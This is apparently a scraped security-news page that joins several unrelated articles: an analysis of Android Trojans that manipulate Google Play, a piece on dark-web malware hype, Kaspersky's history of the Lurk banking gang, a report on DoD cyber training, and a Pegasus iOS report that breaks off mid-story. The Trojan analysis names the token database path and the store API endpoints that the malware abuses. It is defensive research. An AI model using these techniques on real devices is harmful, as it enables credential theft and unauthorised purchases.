14.1 C
London
Tuesday, September 19, 2017

How Trojans manipulate Google Play

For malware writers, Google Play is the promised land of sorts. Once there, a malicious application gains access to a wide audience, gains the trust of that audience and experiences a degree of leniency from the security systems built into operating systems. On mobile devices, users typically cannot install applications coming from sources other than the official store, meaning this is a serious barrier for an app with malicious intent. However, it is far from easy for the app to get into Google Play: one of the main conditions for it is to pass a rigorous check for unwanted behavior by different analysis systems, both automatic and manual. Some malware writers have given up on their efforts to push their malicious creations past security checks, and instead learned how to use the store’s client app for their unscrupulous gains. Lately, we have seen many Trojans use the Google Play app during promotion campaigns to download, install and launch apps on smartphones without the owners’ knowledge, as well as leave comments and rate apps.

The apps installed by the Trojan do not typically cause direct damage to the user, but the victim may have to pay for the created excessive traffic.
In addition, the Trojans may download and install paid apps as if they were free ones, further adding to the users’ bills. Let us look into the methods how such manipulations with Google Play happen. Level 1. N00b The first method is to make the official Google Play app store undertake the actions the cybercriminal wants.

The idea is to use the Trojan to launch the client, open the page of the required app in it, then search for and use special code to interact with the interface elements (buttons) to cause download, installation and launch of the application.

The misused interface elements are outlined with red boxes in the screenshots below: The exact methods of interaction with the interface vary.
In general, the following techniques may be identified: Use of the Accessibility services of the operating system (used by modules in Trojan.AndroidOS.Ztorg). Imitation of user input (used by Trojan-Clicker.AndroidOS.Gopl.c). Code injection into the process of Google Play client to modify its operation (used by Trojan.AndroidOS.Iop). To see how such Trojans operate. Let us look at the example of Trojan.AndroidOS.Ztorg.n.

This malicious program uses Accessibility services originally intended to create applications to help people with disabilities, such as GUI voice control apps.

The Trojan receives a job from the command and control server (C&C) which contains a link to the required application, opens it in Google Play, and then launches the following code: This code is needed to detect when the required interface element appears on the screen, and to emulate the click on it.

This way, the following buttons are clicked in a sequence: “BUY” (the price is shown in the button), “ACCEPT” and “CONTINUE”.

This is sufficient to purchase the app, if the user has a credit card with sufficient balance connected to his/her Google account. Level 2. Pro Some malware writers take roads less traveled.
Instead of using the easy and reliable way described above, they create their own client for the app store using HTTPS API. The difficult part about this approach is that the operation of the self-made client requires information (e.g. user credentials and authentication tokens) which is not available to a regular app. However, the cybercriminals are very fortunate that all required data are stored on the device in clear text, in the convenient SQLite format.

Access to the data is limited by the Android security model, however apps may abuse it e.g. by rooting the device and thus gaining unlimited access. For example, some versions of the Trojan.AndroidOS.Guerrilla.a have their own client for Google Play, which is distributed with the help of the rooter Leech.

This client successfully fulfils the task of downloading and installing free and paid apps, and is capable of rating apps and leaving comments in the Google store. After launch, Guerrilla starts to collect the following required information: The credentials to the user’s Google Play account. Activities in Google Play require special tokens that are generated when the user logs in. When the user is already logged in to Google Play, the Trojan can use the locally cached tokens.

They can be located through a simple search through the database located at /data/system/users/0/accounts.db: With the help of the code below, the Trojan checks if there are ready tokens on the infected device, i.e. if the user has logged on and can do activities in Google Play: If no such tokens are available, the Trojan obtains the user’s username and hashed password, and authenticates via OAuth: Android_id is the device’s unique ID. Google Service Framework ID is the device’s identifier across Google services. First, the Trojans attempts to obtain this ID using regular methods.
If these fail for whatever reason, it executes the following code: Google Advertising ID is the unique advertising ID provided by Google Play services. Guerrilla obtains it as follows: In a similar way, the Trojan obtains hashed data about the device from the file “/data/data/com.google.android.gms/shared_prefs/Checkin.xml“. When the Trojan has collected the above data, it begins to receive tasks to download and install apps.

Below is the structure of one such task: The Trojan downloads the application by sending POST requests using the links below: https://android.clients.google.com/fdfe/search: a search is undertaken for the request sent by the cybercriminals.

This request is needed to simulate the user’s interaction with the Google Play client. (The main scenario of installing apps from the official client presupposes that the user first does the search request and only then visits the app’s page). https://android.clients.google.com/fdfe/details: with this request, additional information needed to download the app is collected. https://android.clients.google.com/fdfe/purchase: the token and purchase details are downloaded, used in the next request. https://android.clients.google.com/fdfe/delivery: the Trojan receives the URL and the cookie-files required to download the Android application package (APK) file. https://android.clients.google.com/fdfe/log: the download is confirmed (so the download counter is incremented.) https://android.clients.google.com/fdfe/addReview: the app is rated and a comment is added. When creating the requests, the cybercriminals attempted to simulate most accurately the equivalent requests sent by the official client.

For example, the below set of HTTP headers is used in each request: After the request is executed, the app may (optionally) get downloaded, installed (using the command ‘pm install -r’ which allows for installation of applications without the user’s consent) and launched. Conclusion The Trojans that use the Google Play app to download, install and launch apps from the store to a smartphone without the device owner’s consent are typically distributed by rooters – malicious programs which have already gained the highest possible privileges on the device.
It is this particular fact that allows them to launch such attacks on the Google Play client app. This type of malicious program pose a serious threat: in Q2 2016, different rooters occupied more than a half of the Top 20 of mobile malware.

All the more so, rooters can download not only malicious programs that compromise the Android ecosystem and spend the user’s money on purchasing unnecessary paid apps, but other malware as well.

Malware Markets: Exposing The Hype & Filtering The Noise

There's a lot of useful infosec information out there, but cutting through clutter is harder than it should be. There is a wealth of genuine, educational information on the infosec industry available through the media, helping the industry and the general public.

Then there are stories put forth by those who just want to get into the headlines for some quick recognition.

This makes it difficult for the tech audience to separate the signal from the noise. I have the perspective of over 20 years in the information security industry, and I’ve seen the cycle of hype continually chase its own tail. Over time, you start to recognize the patterns and learn to tell the difference between the genuine heroes who put out data for the greater good and the villains who are just generating hype. Those individuals and companies that go for the quick win with the press try to get their name associated with as many buzzwords as possible, but when you dig in, you find little to no substance.

There is no data behind many of their claims, they tend not to collaborate with the greater industry, and their overall goal seems to be to spread fear.   With the rise of vendors of all-things-evil on the “Dark Web,” ransomware (which isn’t really new), and other threats, the problem has gotten worse.

Take, for example, the hype surrounding a new ransomware offering, Stampado, being sold on the Dark Web. Once news broke of the cheap ransomware’s availability, word quickly circulated. However, this just shows how attention is being diverted from real threats and to unsophisticated, overhyped commodity malware. Stampado first appeared on the AlphaBay market priced attractively at $39. While that’s an interesting footnote in the lengthy history of ransomware, it doesn’t deserve the headlines.

There are several reasons for this.   First of all, there are other ransomware and ransomware-as-a-service offerings that are either free or cheaper. Many are available in the same market, and some are even more interesting from a code/malware research perspective. A second big issue is the sophistication level.
Stampado doesn’t have a truly automated payment mechanism.
It relies on sending email back and forth to get further instruction on decryption.

Beyond that, it’s fully written/scripted in AutoIT, meaning it’s easily deconstructed and simple to analyze without any advanced tools.   All the coding is right in front of you with a couple of clicks into Exe2Aut: Image Source: Jim Walter Before press coverage around Stampado died down, there were multiple file decryption tools available to undo the changes it made.

And speaking of those changes, unlike many of the more destructive ransomware families, Stampado doesn’t affect all files on the disk or all disks on the system.
It targets specific files within the user profile directory of the current user.

Also, according to AlphaBay, only 55 individuals have actually purchased Stampado to date. There are already plenty of technical teardowns of Stampado, done by genuine researchers who want to dispel the hype.

But for every Stampado, there are thousands of other “scary-sounding” things waiting for the next new-company-on-the-block to exploit.   Malware Clearance BinsMuch of what you find in markets like AlphaBay and entry-level forums are old, cracked (that is, modified to run for free) copies of malware builders, cracked versions of packers/crypters, and even versions of gray- and black-hat tools (Havij Pro, license key generators, etc.) that are booby-trapped with back doors.

There is a lot of scammy, useless garbage out there.

The item below appears in several markets.
It is a scam.

The site it links to (for its cut of the buyer’s profits) is the Encryptor RaaS service, which no longer exists. Image Source: Jim Walter The issue of overhyped threats isn’t specific to Dark Web markets and forums -- it’s a trend that exists elsewhere in our industry.
It’s at a different level, but similar games are played with the release of flashy threat reports.

Almost daily, there is news of a recently discovered, state-sponsored, super-sophisticated advanced persistent threat campaign.
Some of these reports are valid and packed with vetted research.

And some are cut-and-paste jobs or technically inaccurate word salads, designed to grab headlines and notoriety. Experts Must Help Sort Out The HypeThe bottom line is that the good guys need to do a better job of helping our customers and the general public spot the hype.

Those in the security industry must refrain from making a quick “press grab” and disseminate data that really assists customers and the general public.

Building trust and becoming a source of valuable security information is only achieved over time.

There are no overnight heroes, and that needs to be accepted by everyone in the industry. I believe we’re on the right course.

Time and the market we exist in have a way of correcting these situations and allowing the valid, helpful entities in information security rise to the top, while those spreading fear, uncertainty, and doubt eventually fade away. Related Content: Jim Walter is a senior member of Cylance's SPEAR team. He focuses on next-level attacks, actors, and campaigns as well as 'underground' markets and associated criminal activity. Jim is a regular speaker at cybersecurity events and has authored numerous articles, whitepapers ...
View Full Bio More Insights

The Hunt for Lurk

In early June, 2016, the Russian police arrested the alleged members of the criminal group known as Lurk.

The police suspected Lurk of stealing nearly three billion rubles, using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations, including banks.

For Kaspersky Lab, these arrests marked the culmination of a six-year investigation by the company’s Computer Incidents Investigation team. We are pleased that the police authorities were able to put the wealth of information we accumulated to good use: to detain suspects and, most importantly, to put an end to the theft. We ourselves gained more knowledge from this investigation than from any other.

This article is an attempt to share this experience with other experts, particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks. When we first encountered Lurk, in 2011, it was a nameless Trojan.
It all started when we became aware of a number of incidents at several Russian banks that had resulted in the theft of large sums of money from customers.

To steal the money, the unknown criminals used a hidden malicious program that was able to interact automatically with the financial institution’s remote banking service (RBS) software; replacing bank details in payment orders generated by an accountant at the attacked organization, or even generating such orders by itself. In 2016, it is hard to imagine banking software that does not demand some form of additional authentication, but things were different back in 2011.
In most cases, the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash. Russia’s banking system, like those of many other countries, was unprepared for such attacks, and cybercriminals were quick to exploit the security gap. We participated in the investigation of several incidents involving the nameless malware, and sent samples to our malware analysts.

They created a signature to see if any other infections involving it had been registered, and discovered something very unusual: our internal malware naming system insisted that what we were looking at was a Trojan that could be used for many things (spamming, for example) but not stealing money. Our detection systems suggest that a program with a certain set of functions can sometimes be mistaken for something completely different.
In the case of this particular program the cause was slightly different: an investigation revealed that it had been detected by a “common” signature because it was doing nothing that could lead the system to include it in any specific group, for example, that of banking Trojans. Whatever the reason, the fact remained that the malicious program was used for the theft of money. So we decided to take a closer look at the malware.

The first attempts to understand how the program worked gave our analysts nothing. Regardless of whether it was launched on a virtual or a real machine, it behaved in the same way: it didn’t do anything.

This is how the program, and later the group behind it, got its name.

To “lurk” means to hide, generally with the intention of ambush. We were soon able to help investigate another incident involving Lurk.

This time we got a chance to explore the image of the attacked computer.

There, in addition to the familiar malicious program, we found a .dll file with which the main executable file could interact.

This was our first piece of evidence that Lurk had a modular structure. Later discoveries suggest that, in 2011, Lurk was still at an early stage of development.
It was formed of just two components, a number that would grow considerably over the coming years. The additional file we uncovered did little to clarify the nature of Lurk.
It was clear that it was a Trojan targeting RBS and that it was used in a relatively small number of incidents.
In 2011, attacks on such systems were starting to grow in popularity. Other, similar, programs were already known about, the earliest detected as far back as in 2006, with new malware appearing regularly since then.

These included ZeuS, SpyEye, and Carberp, etc.
In this series, Lurk represented yet another dangerous piece of malware. It was extremely difficult to make Lurk work in a lab environment. New versions of the program appeared only rarely, so we had few opportunities to investigate new incidents involving Lurk.

A combination of these factors influenced our decision to postpone our active investigation into this program and turn our attention to more urgent tasks. A change of leader For about a year after we first met Lurk, we heard little about it.
It later turned out that the incidents involving this malicious program were buried in the huge amount of similar incidents involving other malware.
In May 2011, the source code of ZeuS had been published on the Web and this resulted in the emergence of many program modifications developed by small groups of cybercriminals. In addition to ZeuS, there were a number of other unique financial malware programs.
In Russia, there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS.

Carberp was the most active among them.

At the end of March 2012, the majority of its members were arrested by the police.

This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity, and was considered a “leader” among cybercriminals. However, by the time of the arrests, Carberp’s reputation as a major player was already waning.

There was a new challenger for the crown. A few weeks before the arrests, the sites of a number of major Russian media, such as the agency “RIA Novosti”, Gazeta.ru and others, had been subjected to a watering hole attack.

The unknown cybercriminals behind this attack distributed their malware by exploiting a vulnerability in the websites’ banner exchange system.

A visitor to the site would be redirected to a fraudulent page containing a Java exploit.
Successful exploitation of the vulnerability initiated the launch of a malicious program whose main function was collecting information on the attacked computer, sending it to a malicious server, and in some cases receiving and installing an extra load from the server. The code on the main page of RIA.ru that is used to download additional content from AdFox.ru From a technical perspective, the malicious program was unusual. Unlike most other malware, it left no traces on the hard drive of the system attacked and worked only in the RAM of the machine.

This approach is not often used in malware, primarily because the resulting infection is “short-lived”: malware exists in the system only until the computer is restarted, at which point the process of infection need to be started anew.

But, in the case of these attacks, the secret “bodiless” malicious program did not have to gain a foothold in the victim’s system.
Its primary job was to explore; its secondary role was to download and install additional malware.

Another fascinating detail was the fact that the malware was only downloaded in a small number of cases, when the victim computer turned out to be “interesting”. Part of the Lurk code responsible for downloading additional modules Analysis of the bodiless malicious program showed that it was “interested” in computers with remote banking software installed. More specifically, RBS software created by Russian developers. Much later we learned that this unnamed, bodiless module was a mini, one of the malicious programs which used Lurk.

But at the time we were not sure whether the Lurk we had known since 2011, and the Lurk discovered in 2012, were created by the same people. We had two hypotheses: either Lurk was a program written for sale, and both the 2011 and 2012 versions were the result of the activity of two different groups, which had each bought the program from the author; or the 2012 version was a modification of the previously known Trojan. The second hypothesis turned out to be correct. Invisible war with banking software A small digression. Remote banking systems consist of two main parts: the bank and the client.

The client part is a small program that allows the user (usually an accountant) to remotely manage their organization’s accounts.

There are only a few developers of such software in Russia, so any Russian organization that uses RBS relies on software developed by one of these companies.

For cybercriminal groups specializing in attacks on RBS, this limited range of options plays straight into their hands. In April 2013, a year after we found the “bodiless” Lurk module, the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software.

Almost all operated in a similar way: during the exploration stage they found out whether the attacked computer had the necessary banking software installed.
If it did, the malware downloaded additional modules, including ones allowing for the automatic creation of unauthorized payment orders, changing details in legal payment orders, etc.

This level of automation became possible because the cybercriminals had thoroughly studied how the banking software operated and “tailored” their malicious software modules to a specific banking solution. The people behind the creation and distribution of Lurk had done exactly the same: studying the client component of the banking software and modifying their malware accordingly.
In fact, they created an illegal add-on to the legal RBS product. Through the information exchanges used by people in the security industry, we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software.
Some of them were having to release weekly patches to customers.

These updates would fix the immediate security problems, but the mysterious hackers “on the other side” would quickly release a new version of malware that bypassed the upgraded protection created by the authors of the banking programs. It should be understood that this type of work – reverse-engineering a professional banking product – cannot easily be undertaken by an amateur hacker.
In addition, the task is tedious and time-consuming and not the kind to be performed with great enthusiasm.
It would need a team of specialists.

But who in their right mind would openly take up illegal work, and who might have the money to finance such activities? In trying to answer these questions, we eventually came to the conclusion that every version of Lurk probably had an organized group of cybersecurity specialists behind it. The relative lull of 2011-2012 was followed by a steady increase in notifications of Lurk-based incidents resulting in the theft of money.

Due to the fact that affected organizations turned to us for help, we were able to collect ever more information about the malware.

By the end of 2013, the information obtained from studying hard drive images of attacked computers as well as data available from public sources, enabled us to build a rough picture of a group of Internet users who appeared to be associated with Lurk. This was not an easy task.

The people behind Lurk were pretty good at anonymizing their activity on the network.

For example, they were actively using encryption in everyday communication, as well as false data for domain registration, services for anonymous registration, etc.
In other words, it was not as easy as simply looking someone up on “Vkontakte” or Facebook using the name from Whois, which can happen with other, less professional groups of cybercriminals, such as Koobface.

The Lurk gang did not make such blunders. Yet mistakes, seemingly insignificant and rare, still occurred.

And when they did, we caught them. Not wishing to give away free lessons in how to run a conspiracy, I will not provide examples of these mistakes, but their analysis allowed us to build a pretty clear picture of the key characteristics of the gang. We realized that we were dealing with a group of about 15 people (although by the time it was shut down, the number of “regular” members had risen to 40).

This team provided the so-called “full cycle” of malware development, delivery and monetization – rather like a small, software development company.

At that time the “company” had two key “products”: the malicious program, Lurk, and a huge botnet of computers infected with it.

The malicious program had its own team of developers, responsible for developing new functions, searching for ways to “interact” with RBS systems, providing stable performance and fulfilling other tasks.

They were supported by a team of testers who checked the program performance in different environments.

The botnet also had its own team (administrators, operators, money flow manager, and other partners working with the bots via the administration panel) who ensured the operation of the command and control (C&C) servers and protected them from detection and interception. Developing and maintaining this class of malicious software requires professionals and the leaders of the group hunted for them on job search sites.

Examples of such vacancies are covered in my article about Russian financial cybercrime.

The description of the vacancy did not mention the illegality of the work on offer.

At the interview, the “employer” would question candidates about their moral principles: applicants were told what kind of work they would be expected to do, and why.

Those who agreed got in. A fraudster has advertised a job vacancy for java / flash specialists on a popular Ukrainian website.

The job requirements include a good level of programming skills in Java, Flash, knowledge of JVM / AVM specifications, and others.

The organizer offers remote work and full employment with a salary of $2,500.
So, every morning, from Monday to Friday, people in different parts of Russia and Ukraine sat down in front of their computer and started to “work”.

The programmers “tuned” the functions of malware modifications, after which the testers carried out the necessary tests on the quality of the new product.

Then the team responsible for the botnet and for the operation of the malware modules and components uploaded the new version onto the command server, and the malicious software on botnet computers was automatically updated.

They also studied information sent from infected computers to find out whether they had access to RBS, how much money was deposited in clients’ accounts, etc. The money flow manager, responsible for transferring the stolen money into the accounts of money mules, would press the button on the botnet control panel and send hundreds of thousands of rubles to accounts that the “drop project” managers had prepared in advance.
In many cases they didn’t even need to press the button: the malicious program substituted the details of the payment order generated by the accountant, and the money went directly to the accounts of the cybercriminals and on to the bank cards of the money mules, who cashed it via ATMs, handed it over to the money mule manager who, in turn, delivered it to the head of the organization.

The head would then allocate the money according to the needs of the organization: paying a “salary” to the employees and a share to associates, funding the maintenance of the expensive network infrastructure, and of course, satisfying their own needs.

This cycle was repeated several times. Each member of the typical criminal group has their own responsibilities. These were the golden years for Lurk.

The shortcomings in RBS transaction protection meant that stealing money from a victim organization through an accountant’s infected machine did not require any special skills and could even be automated.

But all “good things” must come to an end. The end of “auto money flow” and the beginning of hard times The explosive growth of thefts committed by Lurk and other cybercriminal groups forced banks, their IT security teams and banking software developers to respond. First of all, the developers of RBS software blocked public access to their products.

Before the appearance of financial cybercriminal gangs, any user could download a demo version of the program from the manufacturer’s website.

Attackers used this to study the features of banking software in order to create ever more tailored malicious programs for it.

Finally, after many months of “invisible war” with cybercriminals, the majority of RBS software vendors succeeded in perfecting the security of their products. At the same time, the banks started to implement dedicated technologies to counter the so-called “auto money flow”, the procedure which allowed the attackers to use malware to modify the payment order and steal money automatically. By the end of 2013, we had thoroughly explored the activity of Lurk and collected considerable information about the malware.

At our farm of bots, we could finally launch a consistently functioning malicious script, which allowed us to learn about all the modifications cybercriminals had introduced into the latest versions of the program. Our team of analysts had also made progress: by the year’s end we had a clear insight into how the malware worked, what it comprised and what optional modules it had in its arsenal. Most of this information came from the analysis of incidents caused by Lurk-based attacks. We were simultaneously providing technical consultancy to the law enforcement agencies investigating the activities of this gang. It was clear that the cybercriminals were trying to counteract the changes introduced in banking and IT security.

For example, once the banking software vendors stopped providing demo versions of their programs for public access, the members of the criminal group established a shell company to receive directly any updated versions of the RBS software. Thefts declined as a result of improvements in the security of banking software, and the “auto money flow” became less effective.

As far as we can judge from the data we have, in 2014 the criminal group behind Lurk seriously reduced its activity and “lived from hand to mouth”, attacking anyone they could, including ordinary users.

Even if the attack could bring in no more than a few tens of thousands of rubles, they would still descend to it. In our opinion, this was caused by economic factors: by that time, the criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees’ salaries, it was necessary to pay for renting servers, VPN and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month. Attempts to come back In addition to increasing the number of “minor” attacks, the cybercriminals were trying to solve their cash flow problem by “diversifying” the business and expanding their field of activity.

This included developing, maintaining and renting the Angler exploit pack (also known as XXX).
Initially, this was used mainly to deliver Lurk to victims’ computers.

But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools. By the way, judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status.

Even though many small and medium-sized groups were willing to “work” with them, they always preferred to work by themselves.
So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a “product” from the top underground authority did not need advertising.
In addition, the exploit pack was actually very effective, delivering a very high percentage of successful vulnerability exploitations.
It didn’t take long for it to become one of the key tools on the criminal2criminal market. As for extending the field of activity, the Lurk gang decided to focus on the customers of major Russian banks and the banks themselves, whereas previously they had chosen smaller targets. In the second half of 2014, we spotted familiar pseudonyms of Internet users on underground forums inviting specialists to cooperate on document fraud.

Early the following year, several Russian cities were swamped with announcements about fraudsters who used fake letters of attorney to re-issue SIM cards without their owners being aware of it. The purpose of this activity was to gain access to one-time passwords sent by the bank to the user so that they could confirm their financial transaction in the online or remote banking system.

The attackers exploited the fact that, in remote areas, mobile operators did not always carefully check the authenticity of the documents submitted and released new SIM cards at the request of cybercriminals. Lurk would infect a computer, collect its owner’s personal data, generate a fake letter of attorney with the help of “partners” from forums and then request a new SIM card from the network operator. Once the cybercriminals received a new SIM card, they immediately withdrew all the money from the victim’s account and disappeared. Although initially this scheme yielded good returns, this didn’t last long, since by then many banks had already implemented protection mechanisms to track changes in the unique SIM card number.
In addition, the SIM card-based campaign forced some members of the group and their partners out into the open and this helped law enforcement agencies to find and identify suspects. Alongside the attempts to “diversify” the business and find new cracks in the defenses of financial businesses, Lurk continued to regularly perform “minor thefts” using the proven method of auto money flow. However, the cybercriminals were already planning to earn their main money elsewise. New “specialists” In February 2015, Kaspersky Lab’s Global Research and Analysis Team (GReAT) released its research into the Carbanak campaign targeting financial institutions.

Carbanak’s key feature, which distinguished it from “classical” financial cybercriminals, was the participation of professionals in the Carbanak team, providing deep knowledge of the target bank’s IT infrastructure, its daily routine and the employees who had access to the software used to conduct financial transactions.

Before any attack, Carbanak carefully studied the target, searched for weak points and then, at a certain moment in time, committed the theft in no more than a few hours.

As it turned out, Carbanak was not the only group applying this method of attack.
In 2015, the Lurk team hired similar experts. How the Carbanak group operated. We realized this when we found incidents that resembled Carbanak in style, but did not use any of its tools.

This was Lurk.

The Lurk malware was used as a reliable “back door” to the infrastructure of the attacked organization rather than as a tool to steal money.

Although the functionality that had previously allowed for the near-automatic theft of millions no longer worked, in terms of its secrecy Lurk was still an extremely dangerous and professionally developed piece of malware. However, despite its attempts to develop new types of attacks, Lurk’s days were numbered.

Thefts continued until the spring of 2016.

But, either because of an unshakable confidence in their own impunity or because of apathy, day-by-day the cybercriminals were paying less attention to the anonymity of their actions.

They became especially careless when cashing money: according to our incident analysis, during the last stage of their activity, the cybercriminals used just a few shell companies to deposit the stolen money.

But none of that mattered any more as both we and the police had collected enough material to arrest suspected group members, which happened early in June this year. No one on the Internet knows you are a cybercriminal? My personal experience of the Lurk investigation made me think that the members of this group were convinced they would never be caught.

They had grounds to be that presumptuous: they were very thorough in concealing the traces of their illegal activity, and generally tried to plan the details of their actions with care. However, like all people, they made mistakes.

These errors accumulated over the years and eventually made it possible to put a stop to their activity.
In other words, although it is easier to hide evidence on the Internet, some traces cannot be hidden, and eventually a professional team of investigators will find a way to read and understand them. Lurk is neither the first nor the last example to prove this.

The infamous banking Trojan SpyEye was used to steal money between 2009 and 2011.
Its alleged creator was arrested 2013, and convicted in 2014. The first attacks involving the banking Trojan Carberp began in 2010; the members of the group suspected of creating and distributing this Trojan were arrested in 2012 and convicted in 2014.

The list goes on. The history of these and other cybercriminal groups spans the time when everyone (and members of the groups in particular) believed that they were invulnerable and the police could do nothing.

The results have proved them wrong. Unfortunately, Lurk is not the last group of cybercriminals attacking companies for financial gain. We know about some other groups targeting organizations in Russia and abroad.

For these reasons, we recommend that all organizations do the following: If your organization was attacked by hackers, immediately call the police and involve experts in digital forensics.

The earlier you apply to the police, the more evidence the forensics will able to collect, and the more information the law enforcement officers will have to catch the criminals. Apply strict IT security policies on terminals from which financial transactions are made and for employees working with them. Teach all employees who have access to the corporate network the rules of safe online behavior. Compliance with these rules will not completely eliminate the risk of financial attacks but will make it harder for fraudsters and significantly increase the probability of their making a mistake while trying to overcome these difficulties.

And this will help law enforcement agencies and IT security experts in their work. P.S.: why does it take so long? Law enforcement agencies and IT security experts are often accused of inactivity, allowing hackers to remain at large and evade punishment despite the enormous damage caused to the victims. The story of Lurk proves the opposite.
In addition, it gives some idea of the amount of work that has to be done to obtain enough evidence to arrest and prosecute suspects. Unfortunately, the rules of the “game” are not the same for all participants: the Lurk group used a professional approach to organizing a cybercriminal enterprise, but, for obvious reasons, did not find it necessary to abide by the law.

As we work with law enforcement, we must respect the law.

This can be a long process, primarily because of the large number of “paper” procedures and restrictions that the law imposes on the types of information we as a commercial organization can work with. Our cooperation with law enforcement in investigating the activity of this group can be described as a multi-stage data exchange. We provided the intermediate results of our work to the police officers; they studied them to understand if the results of our investigation matched the results of their research.

Then we got back our data “enriched” with the information from the law enforcement agencies. Of course, it was not all the information they could find; but it was the part which, by law, we had the right to work with.

This process was repeated many times until we finally we got a complete picture of Lurk activity. However, that was not the end of the case. A large part of our work with law enforcement agencies was devoted to “translating” the information we could get from “technical” into “legal” language.

This ensured that the results of our investigation could be described in such a way that they were clear to the judge.

This is a complicated and laborious process, but it is the only way to bring to justice the perpetrators of cybercrimes.

DoD Taps DEF CON Hacker Traits For Cybersecurity Training Program

Famed capture-the-packet contest technology will become part of DoD training as well. The Defense Department for the second year in a row sent one of its top directors to DEF CON in Las Vegas this month, but it wasn’t for recruiting purposes. So what was Frank DiGiovanni, director of force training in DoD’s Office of the Assistant Secretary of Defense for Readiness, doing at DEF CON? “My purpose was to really learn from people who come to DEF CON … Who are they? How do I understand who they are? What motivates them? What sort of attributes” are valuable to the field, the former Air Force officer and pilot who heads overall training policy for the military, says. DiGiovanni interviewed more than 20 different security industry experts and executives during DEF CON. His main question:  “If you’re going to hire someone to either replace you or eventually be your next cyber Jedi, what are you looking for?” The DEF CON research is part of DiGiovanni’s mission to develop a state-of-the-art cyber training program that ultimately helps staff the military as well as private industry with the best possible cybersecurity experts and to fill the infamous cybersecurity skills gap today.

The program likely will employ a sort of ROTC-style model where DoD trains the students and they then owe the military a certain number of years of employment. With the help of DEF CON founder Jeff Moss, DiGiovanni over the the past year has met and then picked the brains of, seasoned hackers and the people who hire them about the types of skills, characteristics, and know-how needed for defending organizations from today’s attackers. DiGiovanni, who is also responsible for helping shape retention and recruitment policy efforts in the DoD, has chatted with CEOs of firms that conduct penetration testing, as well as pen testers and other security experts themselves, to get a clearer picture of the types of skills DoD should be teaching, testing, and encouraging, for future cybersecurity warriors and civilians. This is the second phase of the development of a prototype cyber training course he spearheads for DoD at Fort McNair: the intensive six-month prototype program currently consists of 30 students from all branches of the military as well as from the US Department of Homeland Security.
It’s all about training a new generation of cybersecurity experts. The big takeaway from DiGiovanni’s DEF CON research: STEM, aka science, technology, engineering, and mathematics, was not one of the top skills organizations look for in their cyber-Jedis. “Almost no one talked about technical capabilities or technical chops,” he says. “That was the biggest revelation for me.” DiGiovanni compiled a list of attributes for the cyber-Jedi archetype based on his interviews.

The ultimate hacker/security expert, he found, has skillsets such as creativity and curiosity, resourcefulness, persistence, and teamwork, for example. A training exercise spinoff of DEF CON’s famed capture-the-packet (CTP) contest also will become part of the DoD training program.

DiGiovanni recruited DEF CON CTP and Wall of Sheep mastermind Brian Markus to repurpose his capture-the-packet technology as a training exercise module. “In October, he will submit to the government a repackaged capture-the-packet training capability for DoD, which is huge,” DiGiovanni says.

Also on tap is a capture-the-flag competition, DoD-style, he says. One of the security experts DiGiovanni met with at DEF CON this year was Patrick Upatham, global director of advanced cybersecurity at Digital Guardian. “I was a little apprehensive at first,” Upatham says. “After learning what they are doing and the approach that they are taking, it totally made sense.” “He [Frank] is looking for a completely different mindset and background, and [to] then train that person with the technical detail” to do the job, Upatham says. “They are looking for folks who are more resourceful and persistent, and creative in their mindset.” DoD’s training program is about being more proactive in building out its cybersecurity workforce.

That’s how it has to work now, given that more than 200,000 cybersecurity jobs were left unfilled last year overall.

DoD’s Cyber Mission Force is calling for some 6,200 positions to be filled. The goal is to train that workforce in both offensive and defensive security skills.

That means drilling down on the appropriate problem-based learning, for example.

The current prototype training program doesn’t require a four-year degree, and it’s more of a “journeyman apprentice” learning model, DiGiovanni says. About 80% or so is hands-on keyboard training, he says, with the rest is lecture-based. “A lot of the lectures are by the students themselves, with a learn-by-teaching model,” he says. From 'Cable Dog' To Hax0r DiGiovanni gave an example of one student in the DoD training program who came in knowing nothing about security.

The young man was a self-professed  “cable dog” at Fort Meade, a reference to his job of pulling cable through pipes.

But when he finished the six-month DoD course, he was reverse-engineering malware. “When he came to the course, he didn’t know what a ‘right-click’” of a mouse was, nor did he have any software technology experience, DiGiovanni recalls. “To me, that’s a heck of a success story.” The next step is determining how to scale the DoD training program so that it can attract and train enough cyber warriors for the future.

The goal is to hand off the training program to a partner organization to run it and carry it forward, possibly as early as this fall, he says. Meantime, DiGiovanni says the DEF CON hacker community is a key resource and potential partner. “The security of our nation is at stake.
I think it’s imperative for DoD to embrace the DEF CON community because of the unique skill they bring to the table,” he says. “They want to serve and contribute, and the nation needs them.” Related Content: Kelly Jackson Higgins is Executive Editor at DarkReading.com.
She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...
View Full Bio More Insights

Multiple Apple iOS Zero-Days Enabled Firm To Spy On Targeted iPhone...

Victims of 'lawful intercepts' include human rights activists and journalist, researchers from Citizen Lab and Lookout say. Apple’s much vaunted reputation for security took a bit of beating this week with two separate reports identifying serious vulnerabilities in its iOS operating system for iPhones and iPads. One of the reports, from security firm Lookout and the University of Toronto’s Citizen Lab, details a trio of zero-day vulnerabilities in iOS, dubbed Trident, that a shadowy company called the NSO Group has been exploiting for several years to spy on targeted iOS users. The NSO Group is based in Israel but owned by an American private-equity firm.  The company has developed a highly sophisticated spyware product called Pegasus that takes advantage of the Trident zero-day exploit chain to jailbreak iOS devices and install malware on them for spying on users. In an alert this week, security researchers at Citizen Lab and Lookout described Pegasus as one of the most sophisticated endpoint malware threats they had ever encountered.

The malware exploits a kernel base mapping vulnerability, a kernel memory corruption flaw and a flaw in the Safari WebKit that basically lets an attacker compromise an iOS device by getting the user to click on a single link. All three are zero-days flaws, which Apple has addressed via its 9.3.5 patch.

